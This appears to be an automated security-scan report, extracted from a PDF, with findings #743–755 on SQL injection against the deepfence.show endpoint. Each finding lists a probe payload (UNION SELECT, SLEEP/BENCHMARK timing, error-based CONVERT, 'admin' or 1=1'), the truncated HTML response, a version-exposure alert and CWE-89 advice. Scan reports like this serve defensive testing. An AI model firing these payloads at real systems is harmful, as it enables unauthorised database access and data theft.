HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io ' GROUP BY columnnames having 1=1 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #743\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io@variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #744\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #745\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #746\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #747\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #748\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #749\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #750\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io SLEEP(1)/*' or SLEEP(1) or '\" or SLEEP(1) or \"*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #751\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #752\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #753\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io admin' or 1=1 or ''='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #754\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #755\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL 